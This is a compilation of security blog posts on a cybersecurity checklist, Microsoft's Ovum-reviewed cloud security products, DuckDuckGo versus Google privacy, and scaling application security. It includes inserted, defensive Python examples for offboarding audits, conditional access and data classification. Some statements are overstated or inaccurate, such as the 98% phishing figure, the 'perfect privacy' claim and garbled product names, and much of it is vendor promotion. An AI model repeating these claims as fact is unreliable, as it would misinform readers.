Data cannot be protected if the custodians don’t know it exists, or where it exists. Identification of the data stored, created, or controlled by a company is crucial to understanding your cybersecurity and data protection priorities. Further, identifying whether sensitive data is stored in cloud services, on hard drives, or in file servers can drastically change the strategy needed in order to protect that data. Even Data Loss Prevention (DLP) tools are less effective if the tool is not looking in the right locations to determine whether data is being accessed or is leaving the protected network in some way. Identifying data locations can also help you to ensure your proprietary or confidential data is moved from less secure locations, such as private cloud storage accounts, to secure, company-controlled environments like an enterprise cloud account.

3.  Implement and enforce policies to combat insider threat.

Policies and procedure are essential to combat the human element of cybersecurity. Employees often do not understand what they can and cannot do with a company’s documents, hardware, and system access if there are no policies in place to guide them. Insider threat isn’t necessarily a nefarious actor out to steal company data; it often presents itself in examples such as a well-meaning employee who shares a document with a partner in an insecure way – exposing the data to unauthorized access.

4.  Implement a security awareness training program.

Continuing with the theme of well-meaning employees, phishing attacks are the cause of data breaches in 98% of the cases reported (Verizon DBIR). Anti-phishing measures can only go so far to detect phishing attacks, so it’s up to the employee to know how to recognize a phishing email, and to know what to do with that email. Security awareness training can teach an employee to recognize the signs of phishing emails and may prevent the employees and the company from falling victim to a phishing attack.

5.  Talk to your IT team for multi-factor authentication and anti-phishing measures.

Multi-factor authentication (MFA) is one of the best security controls you can implement to prevent unauthorized access to company systems. Simply put, MFA works by requiring not only something the user knows (e.g. a password) but also something the user has (e.g. a code texted to a cell phone, or better yet, a hardware key the employee has to interact with) for system access. Many instances of unauthorized system access could have been thwarted by a company’s use of MFA on their critical systems. In addition, as mentioned above, phishing attacks are responsible for a large majority of data breaches, and anti-phishing measures should be taken to protect corporate email systems.

6.  Implement a third party vendor risk management program.

Many companies work with third party vendors and service providers and in some cases, these providers need access into corporate infrastructure and IT systems.  You can invest millions or even billions into your cybersecurity program, but it can be for nothing if a trusted service provider becomes compromised. As is the case in many high profile breaches, it was the service provider who suffered the breach, in turn causing their partners to suffer the same fate.  Implement a third party risk management program in which new and existing service providers must show proof of their internal security program practices and controls, before allowing them access into a corporate system.

7.  Implement onboarding and offboarding policies that integrate HR and IT.

When onboarding a new employee, a policy needs to be in place that allows your HR and IT departments to work together to determine what information the new hire needs access to in order to do their job. Equally important, you must also have a policy in place for offboarding. Without proper offboarding policies, former employees or contractors may still be able to access certain IT systems well after they’ve left the organization. Cases where former contractors or employees retained access to a company’s IT systems for months or even years after that access should have been revoked are not uncommon. And in many cases, an employee who leaves a company involuntarily decides to use their company access to destroy documents or steal company intellectual property, and can be as destructive as deleting entire servers and infrastructure, leaving the company to pick up the pieces. Access to systems should be approved by HR (to prevent extra accounts and backdoors from being created without company knowledge), and departed employees should be immediately deprovisioned from all systems.
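As an added example of the HR/IT integration in step 7 (not code from the GRA Quantum post), the following reconciles an IT account export against an HR roster and reports the gaps the step describes: accounts nobody in HR vouches for, enabled accounts of terminated staff or expired contractors, and logins after the departure date. The roster, accounts, IDs and dates are constructed samples.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional


@dataclass(frozen=True)
class HrRecord:
    person_id: str
    status: str               # "active" or "terminated"
    end_date: Optional[date]  # termination date, or contract end date for contractors


@dataclass(frozen=True)
class Account:
    username: str
    person_id: Optional[str]  # None when IT never linked the account to a person
    enabled: bool
    last_login: Optional[date]


# Constructed sample roster and account export; names, IDs and dates are placeholders.
HR_ROSTER = [
    HrRecord("E100", "active", None),
    HrRecord("E101", "terminated", date(2019, 4, 30)),
    HrRecord("C200", "active", date(2019, 5, 1)),    # contractor whose engagement has ended
    HrRecord("E102", "active", None),
]
ACCOUNTS = [
    Account("alice", "E100", True, date(2019, 5, 14)),
    Account("bob", "E101", True, date(2019, 5, 10)),        # logging in after termination
    Account("carol-ctr", "C200", True, None),
    Account("svc-backup2", None, True, date(2019, 5, 13)),  # no HR record behind it
    Account("dave", "E102", False, date(2019, 2, 1)),       # disabled: not an access risk
]

GAP_KINDS = ("orphaned", "terminated_but_enabled", "contract_expired", "used_after_departure")


def find_offboarding_gaps(accounts, roster, today, grace_days=0):
    """Reconcile enabled accounts against HR and bucket the deprovisioning failures.

    grace_days tolerates a short lag between the HR end date and the IT
    deprovisioning run; a login after the end date is reported regardless.
    """
    by_id = {r.person_id: r for r in roster}
    grace = timedelta(days=grace_days)
    gaps = {kind: [] for kind in GAP_KINDS}
    for acct in accounts:
        if not acct.enabled:
            continue
        rec = by_id.get(acct.person_id) if acct.person_id else None
        if rec is None:
            gaps["orphaned"].append(acct.username)  # nobody in HR vouches for this account
            continue
        if rec.status == "terminated":
            departure = rec.end_date or today       # terminated with no date: treat as today
            kind = "terminated_but_enabled"
        elif rec.end_date is not None and rec.end_date <= today:
            departure = rec.end_date
            kind = "contract_expired"
        else:
            continue                                # current employee or contractor
        if today >= departure + grace:
            gaps[kind].append(acct.username)
        if acct.last_login is not None and acct.last_login > departure:
            gaps["used_after_departure"].append(acct.username)
    return gaps


if __name__ == "__main__":
    for kind, users in find_offboarding_gaps(ACCOUNTS, HR_ROSTER, date(2019, 5, 15)).items():
        print(f"{kind}: {users}")
```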

Implementing any cybersecurity controls or program initiatives requires a company culture shift and executive buy-in. However, organizations of any size simply cannot afford to ignore security, nor can they wait for a breach to occur before security is taken seriously. The steps outlined in this post will be an excellent start to a strong security program and will help you gain traction for future program changes and improvements.

Download the Checklist to Share.

The post 7 Steps to Strengthen Your Cybersecurity Program Today appeared first on GRA Quantum.

Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments

According to a new Ovum report, “[Azure Sentinel]…positions [Microsoft] to be a force for change in a security information and events management (SIEM) market that is ripe for disruption at the moment.” As enterprises migrate to the cloud, they’re increasingly operating on-premises and cloud environments spread across multiple cloud providers. These complex environments and multiple security products can make it challenging for security professionals to make correlations across their entire infrastructure and separate the signal from the noise.

The report, titled Microsoft’s Expanded Horizons in Security, written by Rik Turner and published in April 2019, evaluated Azure Sentinel among other new Microsoft services and determined that hybrid cloud customers who use Azure as one of their cloud providers should consider Microsoft for security across hybrid and multi cloud environments.

Ovum notes that in the last few years Microsoft has introduced new services and capabilities that support operating systems and platforms beyond Windows. The report identified the following reasons that Microsoft security products are appropriate if you need to secure non-Microsoft products as well as Azure:

  • Password-less authentication and conditional access.
  • Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure.
  • Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security.
  • Azure Sentinel may disrupt the security management marketplace.

Azure for password-less authentication and conditional access

Active Directory and Azure Active Directory (Azure AD) are market leaders for on-premises and cloud-based directories that many enterprises already use. In addition to provisioning and deprovisioning, security capabilities such as modern authentication and conditional access make Azure AD a compelling choice for identity access management (IAM).

In recent years, Microsoft has introduced many capabilities to support modern authentication. Multi-Factor Authentication (MFA), or Two-Factor Authentication (2FA), lets you enforce a secondary authentication method so you don’t rely on passwords alone. Azure AD supports password-less authentication such as biometrics and FIDO2-compliant security keys, and the Microsoft Authenticator mobile app, which generates a one-time passcode or a push notification, can serve as the secondary authentication method.

Azure AD conditional access gives administrators additional control over who can access company resources, both on the first access attempt and throughout the user session. Conditional access works by evaluating the circumstances of the authentication request, such as the device used, the location of the request, the user, or the network, to assign a risk score and then automatically apply pre-defined access policies.

For example, if a user attempts to access sensitive data from an unsecured network, Azure AD can block the request. If a user has been deemed likely compromised, Azure AD can require a password reset before allowing access.

Azure AD security policies aren’t just for Microsoft products. Integration with Microsoft Cloud App Security, a cloud access security broker (CASB), lets you extend authentication policies to all your cloud apps, including non-Microsoft applications.
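To make the conditional access flow described above concrete, here is a small policy evaluator added as an illustration. It is not Azure AD code and not Microsoft's API; the signal weights, the resource names, the allowed-country list and the decision labels are all constructed assumptions. It models the two policies the post gives as examples (block sensitive data from an unsecured network, force a password reset for a likely-compromised user) plus a generic "require MFA above a risk threshold" rule, and re-runs the policies when the session context changes, which is what "throughout the user session" amounts to.

```python
"""Toy conditional-access evaluator (added illustration, not Azure AD code).

Each sign-in request carries context (user, device state, location, network,
user-risk level). The evaluator turns that context into a risk score and then
applies pre-defined policies, most restrictive first.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class SignInRequest:
    user: str
    resource: str
    device_compliant: bool   # managed device that passes compliance checks?
    country: str             # geolocation of the request (ISO code)
    network: str             # "corporate", "home", "public_wifi" or "tor"
    user_risk: str           # "none", "medium" or "high" (from risk detection)


# Constructed sample configuration: what the organisation treats as sensitive
# and where it normally expects its users to sign in from.
SENSITIVE_RESOURCES = {"hr-payroll", "finance-ledger"}
ALLOWED_COUNTRIES = {"US", "GB", "DE"}
UNSECURED_NETWORKS = {"public_wifi", "tor"}
MFA_THRESHOLD = 20  # assumed threshold; any score at or above it needs a 2nd factor


def risk_score(req: SignInRequest) -> int:
    """Sum of weighted signals; higher means riskier (weights are assumptions)."""
    score = 0
    if not req.device_compliant:
        score += 20
    if req.country not in ALLOWED_COUNTRIES:
        score += 30
    if req.network == "public_wifi":
        score += 20
    elif req.network == "tor":
        score += 50
    score += {"none": 0, "medium": 25, "high": 60}[req.user_risk]
    return score


def evaluate(req: SignInRequest) -> str:
    """Return ALLOW, REQUIRE_MFA, REQUIRE_PASSWORD_RESET or BLOCK.

    Policies are checked most restrictive first so that a blocking rule is
    never masked by a weaker one that happens to match as well.
    """
    # Policy 1: a user deemed likely compromised must reset the password first.
    if req.user_risk == "high":
        return "REQUIRE_PASSWORD_RESET"
    # Policy 2: sensitive data requested from an unsecured network is blocked.
    if req.resource in SENSITIVE_RESOURCES and req.network in UNSECURED_NETWORKS:
        return "BLOCK"
    # Policy 3: anything above the risk threshold needs a second factor.
    if risk_score(req) >= MFA_THRESHOLD:
        return "REQUIRE_MFA"
    return "ALLOW"


def reevaluate_session(original: SignInRequest, **changes) -> str:
    """Continuous evaluation: re-run the policies when session context changes
    (for example the client moves from the corporate network to public Wi-Fi)."""
    return evaluate(replace(original, **changes))


if __name__ == "__main__":
    first = SignInRequest("alice", "wiki", True, "US", "corporate", "none")
    print(evaluate(first))                                         # ALLOW
    print(reevaluate_session(first, network="public_wifi"))        # REQUIRE_MFA
    print(evaluate(replace(first, resource="hr-payroll",
                           network="public_wifi")))                # BLOCK
    print(evaluate(replace(first, user_risk="high")))              # REQUIRE_PASSWORD_RESET
```

The order of the policy checks is the design point: a real policy engine resolves conflicting rules with a fixed precedence (block beats step-up, step-up beats allow), and the evaluator above makes that precedence explicit instead of relying on whichever rule happens to be listed first.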

Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure

Recent acquisitions and the Microsoft Intelligent Security Graph give Microsoft the data and technology to provide protection across identities, endpoints, emails, messages, documents, cloud applications, and infrastructure. The Intelligent Security Graph gathers threat information from Microsoft products deployed around the world, security partners, and Microsoft’s own security team. To make sense of trillions of signals, machine learning and artificial intelligence (AI) algorithms analyze the data to find correlations and patterns. The Microsoft Threat Protection suite of products uses analysis from the Intelligent Security Graph to learn what normal user behavior looks like, so that it can detect and then alert on or block anomalous behavior.

Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security

Microsoft Information Protection helps secure data at rest in file repositories, cloud storage services, and on users’ devices. It also protects data in motion as it moves between locations. The service accomplishes this in four steps: detection, classification, protection, and monitoring. Microsoft Information Protection is able to detect sensitive data across on-premises and cloud repositories. Once the data is detected, Microsoft Information Protection classifies and labels it based on a pre-defined taxonomy that identifies how sensitive the data is, such as “Highly Confidential” or “Non Business.” Protection is applied based on the classification and can include actions such as file encryption. You can set policies to prevent copy and save functions, among other protections. Monitoring capabilities allow administrators to track the document as it moves inside and outside of your organization.

Microsoft Cloud App Security integrates with Microsoft Information Protection to extend the discovery, classification, protection, and monitoring capabilities to cloud apps. Administrators can even quarantine a file or limit sharing after it has moved to non-Microsoft cloud services.
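The four-step flow (detect, classify, protect, monitor) is easier to see as code. The following is an added illustration written for this page, not Microsoft Information Protection or Cloud App Security code: the detection patterns, the label taxonomy, the protection actions and the move/share check are all constructed assumptions. It also shows the post's last point, a file whose label carries a share restriction being stopped when it is moved to an external service.

```python
"""Toy detect -> classify -> protect -> monitor pipeline (added illustration).

Detection uses regular expressions for a few sensitive data types, classification
maps findings to a label from a small taxonomy, protection derives actions from
the label, and monitoring records an audit event each time the document moves.
"""
import re
from dataclasses import dataclass, field

# Step 1 inputs: detection rules (constructed and deliberately simple; a real
# classifier would validate checksums and use many more patterns).
DETECTORS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "internal_marker": re.compile(r"\bINTERNAL ONLY\b", re.IGNORECASE),
}

# Step 2: taxonomy, most sensitive first; a label applies when any of its
# data types was detected. Label names follow the post's examples.
TAXONOMY = [
    ("Highly Confidential", {"credit_card", "ssn"}),
    ("Confidential", {"internal_marker"}),
]
DEFAULT_LABEL = "General"

# Step 3: protection actions attached to each label (assumed policy).
PROTECTION = {
    "Highly Confidential": {"encrypt", "block_copy", "block_external_share"},
    "Confidential": {"encrypt", "watermark"},
    "General": set(),
}


@dataclass
class Document:
    name: str
    text: str
    label: str = DEFAULT_LABEL
    protections: set = field(default_factory=set)
    audit: list = field(default_factory=list)   # step 4: monitoring trail


def detect(text: str) -> dict:
    """Step 1: return {data_type: match_count} for every type found in the text."""
    return {name: len(pat.findall(text)) for name, pat in DETECTORS.items()
            if pat.search(text)}


def classify(findings: dict) -> str:
    """Step 2: pick the most sensitive label whose data types were detected."""
    for label, types in TAXONOMY:
        if findings.keys() & types:
            return label
    return DEFAULT_LABEL


def protect(doc: Document) -> Document:
    """Steps 1-3 on one document: detect, label, then apply the label's protections."""
    findings = detect(doc.text)
    doc.label = classify(findings)
    doc.protections = set(PROTECTION[doc.label])
    doc.audit.append(f"labelled {doc.label} (findings={sorted(findings)})")
    return doc


def move(doc: Document, destination: str, external: bool) -> bool:
    """Step 4: monitor a move. Enforce the share restriction and log the event;
    returns True when the move is allowed."""
    allowed = not (external and "block_external_share" in doc.protections)
    where = "external" if external else "internal"
    doc.audit.append(f"move to {destination} ({where}): {'allowed' if allowed else 'DENIED'}")
    return allowed


if __name__ == "__main__":
    # Constructed sample document containing a test card number and a marker.
    d = protect(Document("invoice.txt", "Card 4111 1111 1111 1111 on file. INTERNAL ONLY draft."))
    print(d.label, sorted(d.protections))
    print(move(d, "sharepoint/finance", external=False))   # True
    print(move(d, "third-party-drive", external=True))     # False
    print(*d.audit, sep="\n")
```

The value of keeping the audit trail on the document object is that the monitoring step does not depend on where the file ends up; whichever service it moves to, the label and its history travel with it, which is the property the post attributes to the Cloud App Security integration.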

Azure Sentinel may disrupt the security management marketplace

Ovum’s report identifies opportunities to offer better products in security management, especially SIEM platforms and products. SIEMs aggregate log files into one repository so security teams can analyze the data and remediate detected threats. As the amount of data has increased, the need to augment SIEMs with more robust analytics capabilities has exploded. SIEMs charge a lot to store log files, and customers are overwhelmed by the number of alerts their SIEM platforms generate, many of them false positives.

Azure Sentinel can save time, reduce costs, and reduce alert fatigue by using AI and machine learning models to sift through the noise and more accurately identify real threats. Azure Sentinel currently aggregates data from Office 365 apps and data from security partners. In pilot tests, it reduced alert fatigue by as much as 90 percent.

Microsoft’s other security management offerings can help customers manage security across a diverse cloud ecosystem. Azure Security Manager helps customers stay compliant with regulations, identifies security vulnerabilities, and detects and blocks threats. Later this year, these capabilities will be extended to Amazon Web Services (AWS) and eventually Google Cloud Provider (GCP).

Learn more

The report offers several examples of how Microsoft is evolving its security strategy to support the complex environments that enterprises must secure. Ovum expects that Microsoft will continue to expand the number of products that secure multiple platforms as it provides more support for Mac, Linux, AWS, and GCP.

Read the Ovum report to learn more about how Microsoft’s current offering and strategy makes it a good fit for current Azure customers who have a mix of on-premises and clouds and/or use two or more cloud service providers.

The post Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments appeared first on Microsoft Security.

Duckduckgo vs Google: A Security Comparison and How to Maximize Your Privacy

Preoccupied with privacy? You’ve come to the right place. In today’s guide, I’ll go through everything you should know about Duckduckgo vs Google, how each of them works and how you can make the switch work for you (or not). You’ll also get performance comparisons, pros and cons for each product and advice on how to make the most of your privacy.

Should you decide in the end to switch to the Duckduckgo search engine over Google (I won’t tell you what to do; the decision is entirely yours after getting all the info below), I’ll also share extra advice on how to make the most of your Duckduckgo products. Since the software suite is not limited to the search engine, there are also some other software products to consider. But first things first: let’s check out the Duckduckgo vs Google competition, comparison, and in-depth analysis.

Duckduckgo vs Google: The Competition Between Them and the Shift of Users

Usually, when people think of the Duckduckgo vs Google competition they are immediately thinking of the search engine Duckduckgo vs the search engine Google. Namely, this debate is about whether to use Duckduckgo or Google as your default browser search engine and / or homepage.

Even though Duckduckgo has other tools and apps besides its search engine, as I’ll get into below, for now let’s keep referring strictly to the search engine. This way, you’ll understand better what all the fuss is about with the Duckduckgo vs Google debate. Here’s an overview of public perception on it and everything you need to know about the context of this competitive comparison.

As the tools and techniques used for data gathering have slowly turned into more and more comprehensive algorithms tracking scores of information, both consumers and businesses have become more preoccupied with privacy. The rise of the so-called big data and big tech conglomerates has led to an increased level of surveillance which makes most people uncomfortable.

The fact that all the search history of users is tracked by Google (even in incognito browser mode) has contributed to the growing discomfort of concerned users.

If they’re not particularly concerned with how Google itself manages their personal data, then they’re concerned about data breaches.

Nowadays, with so many breaches making the headlines, it’s hard to trust that your data will remain as private as you’d like. Even if the entities you’re willing to share that data with have your confidence, no one is truly unhackable.

So How Are Duckduckgo and Google Competing?

Google doesn’t compete with Duckduckgo so much, in the grand scheme of things. Google is the big guy in the industry and while they are certainly aware of their smaller competitors catching up, it’s not really the same league. Yet.

Virtually all internet users tend to be Google search engine users, by default. The main strategy for Google is to try to hold on to the users it has by implementing better security and privacy protection measures. This is something definitely on their agenda, but the issue still remains that user data is tracked. Therefore, Google is leaking some users who are leaving its boat in order to climb aboard that of Duckduckgo.

For their part, Duckduckgo are directly positioning themselves as an alternative and competitor to the Google search engine. Their blog sets out to answer the very direct question of ‘Why You Should Use Us Instead of Google’.

So, why do some users prefer switching to Duckduckgo from Google? Here’s our unbiased comparison.

Duckduckgo Search Engine at a Glance: Pros and Cons

Obviously, since many users (exact number unknown) are switching to Duckduckgo from Google, the product is a great one, for people who are more concerned with privacy.

Why is the number of Duckduckgo users unknown?

Well, that’s the beauty of it: not even Duckduckgo knows exactly how many users it has, precisely because they do not track them. Nice, right?

However, according to their official approximations based on the number of searches they get each month and based on the fact that each user makes 1 search per day, on average (so 30 per month), their total user pool should be around 25 million people. That’s pretty impressive.

As a side note, I’d like to point out that my intuition says people make more than 30 searches per month if they are active internet users. And if they heard about Duckduckgo enough as to use it, they are probably tech-savvy and active enough online to use their devices almost daily. Therefore, I’d say that there’s a good chance that some users only switch to Duckduckgo when they are doing searches which they would rather keep truly private. Funny thought.

As you can see, the main advantage, unique selling point and promise of the Duckduckgo search engine is its utter privacy. Here’s the entire picture of my Duckduckgo review, broken down in pros and cons.

Pros of Duckduckgo as a search engine:

  • Perfect privacy. No data on your online searches is collected or stored. (If you want this privacy to extend beyond searches to all your browser activity, you need to install the complementary Duckduckgo products, which I describe below.)
  • No ads targeting you based on your searches.
  • No social engineering techniques used on you based on your searches and other interests.
  • You can be sure you are getting the same search results as all other users (no targeting or profiling).
  • 1-page search results. Infinite scroll: as long as you keep going down, more search results keep loading. It’s a well-known fact that many users don’t make it to the second page of Google search results, but Duckduckgo just presents to you more info on the same page so you never have to click next and lose the initial results from sight.

Cons of Duckduckgo as a search engine:

  • Has a few nice extra perks and features, but still not as many as Google. Just think of Google Maps, Google Flights, Google Finance, Google Books, etc.
  • Less personalization: Duckduckgo doesn’t remember your search history, which is technically an advantage for privacy, but it can also be less convenient sometimes.

screenshot with duckduckgo search

For example, here’s a Duckduckgo search I did for ‘Aviatorilor’, a place in Bucharest, the city I live in. Normally, with Google, I would also get the option of quickly checking on the map where that place is, how to get there from my location, how long this will take, and so on.

In terms of privacy, Duckduckgo clearly wins. But if privacy is not your main concern, Google is an incredible product as well, and not one to reject without careful consideration. Here’s how things look from the other side, too.

Google Search Engine at a Glance: Pros and Cons

Google is not the immediate loser in this competition, however, and not only because it’s still leagues ahead of Duckduckgo and most internet users still use the Google search engine.

It also has unique advantages when compared to Duckduckgo, advantages which derive precisely from its data collecting practices. After all, even if your personal data is used by Google to make money, you still get a few benefits too.

It all comes down to whether you prefer privacy or personalization. Since personalization requires data storing, you can’t have both.

So, here are the pros and cons of the Google search engine, very briefly.

Pros of Google as a search engine:

  • Displays unique content (including advertising content) tailored for your preferences and history
  • Offers built-in features which can be of help (like Google Maps, or help with calculating your trajectory to a place you’re searching for, or search results filters like Books or Flights, etc.)
  • Remembers your search history (this also counts as a con, but it can be helpful in some cases when you want to revisit a web page you forgot to save elsewhere)
  • It’s integrated with your other Google accounts and products, which can sometimes be rewarding.

Cons of Google as a search engine:

  • Remembers your search history (also counts as a pro if you need it, see above).
  • Not even incognito browsing is truly private (read the fine print the next time you open an incognito browser tab in Chrome – or Mozilla, for that matter).
  • Sells your data to third parties and offers them sophisticated tools of tracking you across the web so you can be bombarded with tailored ads.
  • Pulls data from your private emails in order to spam you with ads. Google representatives say this is an automatic process and that no human employee sees your personal emails but it can still be uncomfortable for some users. Imagine, for example, that you and your partner are surprised with an unexpected pregnancy and you’re considering abortion, only to be spammed with baby carriage ads all of a sudden.

How to Protect Your Privacy with the Duckduckgo Search Engine

If you decide to go for Duckduckgo as a way to protect your privacy a bit more, here is everything you need to know in order to make the most of it. The goal is to increase your privacy while also making sure you understand all the ways you can use the Duckduckgo technology to its fullest potential and, if possible, to preserve some of the convenience we are used to from the Google days.

Frequently asked questions about Duckduckgo

Q: Can you browse dark web websites with Duckduckgo?

A: Indeed, you can. But we’d recommend using the go-to browser for the deep and dark web, which is the Tor browser. Many users browse the darker regions of the internet by using the Duckduckgo search engine on the Tor browser.

That still doesn’t mean that doing illegal things on the dark web or the deep web will stay secret, however. Law enforcement can still track illegal activity taking place there (as they should). But as far as privacy goes (and if you don’t want the other users lurking around the creepy corners of the web to see you), Duckduckgo is a great tool.

Q: What browser is better for privacy, Tor or Duckduckgo?

A: First of all, let’s make something clear: there is no Duckduckgo browser on computers. There’s just the Duckduckgo extension to be added to Chrome. But you can use Duckduckgo as a search engine on the Tor browser and that is, indeed, a much more private option than using Duckduckgo in Chrome (even with the extension installed).

On the other hand, there are Duckduckgo browsers for mobile devices (more on those in the products section below). Still, mobile devices also have the option of using the Tor browser for Android. Both are just as safe, privacy-wise.

Q: How does Duckduckgo make money if it blocks ads?

A: One of the major things that puts people off regarding Google is that it makes money selling their data to advertisers. You know what they say – when a product is free of charge, it’s because you are the product.

So, in search of more privacy and less misuse of their data (or less risk of data breaches), people switch to Duckduckgo. But then they think ‘wait, but Duckduckgo is also free’. So how do they make money, then, if they don’t store and sell data?

Just because they offer you complete privacy, it doesn’t mean Duckduckgo has no advertising ties. The Duckduckgo business model is still based on advertising and affiliate revenue. The ads are displayed on the right of your search results, based on the exact keyword of the search. But unlike Google, those ads are not personalized (as in, based on your search history, demographics, shopping history, etc.), because your data is not tracked.

Other Duckduckgo Products to Consider

Mainly, Duckduckgo is a search engine, and that’s their core product offering: a search engine with a much stronger focus on privacy than Google’s practices, which is great for users who are concerned about this. In today’s digital landscape, we should all be a little more watchful of our private data and what happens to it.

So the privacy aspect of the Duckduckgo search engine is what makes people use them.

The search engine is their main product, and you can access and use it directly at its URL. It’s simple and clean and requires no other product for its use.

On the other hand, you can also access this search engine from the Duckduckgo products which complement it. Here are the options:

  • The Duckduckgo extension for Chrome: As far as security goes, this is a great Chrome extension to add*. It’s great if you want to keep using Google Chrome (it’s not like you want to reject the brand altogether) but still make sure that the Duckduckgo search engine is used everywhere in your browser by default, and that your data is not collected or stored. Using the Duckduckgo extension for Chrome will also block advertising trackers.
  • The Duckduckgo Privacy Browser (Android app): This is a privacy browser meant to be used on tablets and smartphones using the Android OS.
  • The Duckduckgo Privacy Browser (Apple app): This app is the same, but issued for Apple mobile devices (like iPhones).

You will notice that there is no Duckduckgo browser for computers or laptops. That’s because it isn’t needed: the Duckduckgo extension for Google Chrome effectively turns your browser into a Duckduckgo browser.

Of course, you can still use the Duckduckgo search engine with other browsers as well, such as Mozilla Firefox, or Opera and so on.

Some users who really want to maximize their privacy protection use the Tor browser with the Duckduckgo search engine. Duckduckgo is actually the default search engine for the Tor browser, especially desirable for users who want to browse the deep web or the dark web safely.

Important note: you will notice many other sources and blogs saying Duckduckgo is a ‘safe browser’ or ‘secure browser’. This safety and security they are referring to only extends to the privacy aspect. Using Duckduckgo will not keep you safe from viruses, malware, ransomware, and other internet dangers. Only a full security solution (based both on an anti-virus component and a traffic filtering, proactive component, like our Thor Premium Home) can protect you from cyber-attacks.

*You can also check out other great Google Chrome extensions for increased security (all hand-picked by us and devoid of any ulterior motive like compensation or whatever).

Bonus: 15 Extra Duckduckgo Features which Google Doesn’t Have

#1. Seeing social media bios

You can have links to the social media profiles featured on a website directly from the search results. If you want to connect to an author or customer support for a specific business and so on, Duckduckgo will point you directly to those profiles, no need to enter the website and manually search for them.

#2. App store alternatives to apps

You can search for apps in the app stores just as you would do in any other search engine, but Duckduckgo will also present you with alternatives for the same thing. No more time wasted on scout work.

#3. The Duckduckgo bangs

This is a very cool feature that allows you to search within a specific website for the words you want. Here is the entire list of Duckduckgo bangs.

#4. Weather data available instantly

You can search for simple things like ‘Is it raining in [town name]?’ and you’ll find out what you need to know instantly.

#5. Keyboard shortcuts

Macros and other cool keyboard shortcuts are just a few settings away in Duckduckgo.

#6. Emoticon ‘translations’

Not sure what an emoticon like ‘;;)’ means? Just ask Duckduckgo. (P.S: It’s something from the ancient times of Yahoo Messenger and I know it because I’m old. No, I’m not serious about the last part).

#7. Quick stopwatch

Just what the name says.

#8. Drink recipes

If you search for stuff like ‘how to make a mojito’, the recipe will be displayed right in the search results, no click required. Cheers!

#9. Password generator

Just like other browsers, Duckduckgo will help you generate stronger passwords. (This is important because of credential stuffing attacks and so on). But unlike other browsers, it won’t store them in any way. That’s up to your memory, password manager tool, etc.

#10. Finding rhymes

Troubled by some poetry writing and you just can’t find the rhyme? Or you’re unsure whether two words actually rhyme? No worries, ask Duckduckgo and it will tell you. Yes, seriously.

#11. Calendar as an instant answer

Google also has a calendar feature, but with Duckduckgo it’s an instant answer. You can just search for ‘March 2021’ and you will instantly see the month calendar laid out right in the search results.

#12. Loan calculators

Need help figuring out interest rates and stuff? Duckduckgo has you covered with this too.

#13. Cool features for developers

Plenty of nice things. Here’s just a few:

  • Generate lorem ipsum text quickly and automatically
  • Encode links to machine-readable text
  • Convert binary code to decimal code
  • Convert content to ASCII texts
  • Show a list of special characters and their HTML values
  • Show HTML value for any special character
  • Convert colors to their universal numeric code
  • Show colors based on hexadecimal values

#14. Anagram solver

If you have a poetry writing assistant built-in, why not also an anagram solver assistant? Yes, it really works.

#15. Instant text converting for lower-case, upper-case and capital letter

This is super-useful whenever you need to modify a text in this regard, and it’s a feature currently supported nowhere else.

Final words

If you think these Duckduckgo features look good, rest assured that there are many, many more. Some are downright useful, others just cute, but there’s no denying that Duckduckgo is heading on the right track when it comes to popularity.

This surge isn’t limited to the geek community. More and more users are making their choice in the Duckduckgo vs Google battle, and it’s not in favor of the Google giant.

The post Duckduckgo vs Google: A Security Comparison and How to Maximize Your Privacy appeared first on Heimdal Security Blog.

Keys to Scaling Your Application Security Program

It’s best practice to kick off your AppSec initiative by starting small, scanning your most business-critical apps, and addressing the most severe flaws. But it’s also best practice to scale your program to eventually cover your entire app landscape, and all flaws. Why? First, because you can be breached through non-critical apps; JP Morgan was breached through third-party software supporting its charitable road race, and Target was breached through its HVAC vendor’s software. Second, you can be breached through a low-severity vulnerability. Oftentimes, a low-severity flaw can be just as risky as, if not riskier than, a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How do you make this transition from few to many, especially with limited security staff and expertise? This is a significant challenge. In fact, we typically see AppSec programs fail for two reasons: Lack of experience in running an application security program, and the inability to hire enough qualified staff to run application security tools at scale. Very few application security managers have run large programs before and have the experience to predict ramp up and adoption. The global shortage of security professionals also makes it difficult to hire enough people to coordinate between development and security teams. The 2018 Cyberthreat Defense Report found that a rising shortage of skilled personnel is the number one inhibitor organizations face when trying to establish a security program.

Yet, we’ve also helped thousands of customers grow and mature their AppSec programs over the past 12 years, and we know there are a few keys to effectively scaling an application security program. These keys include:

The right partner

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise and free your team to focus on managing risk by taking these tasks off their plates:

  • Addressing the blocking and tackling of onboarding
  • Application security program management
  • Reporting
  • Identifying and addressing barriers to success
  • Working with development teams to ensure they are finding and remediating vulnerabilities

We’ve seen the difference this support makes: Veracode customers who work with our security program managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics.

In fact, data collected for our State of Software Security report found that developers who get remediation coaching from our security experts fix 88 percent more flaws.

Security champions

Another way to scale your AppSec program is to develop and nurture security champions within your development teams. While these developers aren’t (and don’t have to be) security pros, they can act as the security conscience of the team by keeping their eyes and ears open for potential issues. The team can then fix the issues in development or call in your organization’s security experts for guidance. An embedded security champion can effectively help an organization make up for a lack of security coverage or skills by acting as a force multiplier who can pass on security best practices, answer questions, and raise security awareness. Because your security champion speaks the lingo of developers and is intimately involved in your organization’s development projects, he or she can communicate security issues in a way that development teams will understand and embrace.

How can you start developing security champions?

  • Get leadership buy-in. Make sure management, the security team, and the Scrum leaders are willing to invest the time, money, and resources it will take to make security champions effective.
  • Set the standard. Create expectations for what security champions should do and incorporate it into their pre-existing peer review work to minimize disruptions.
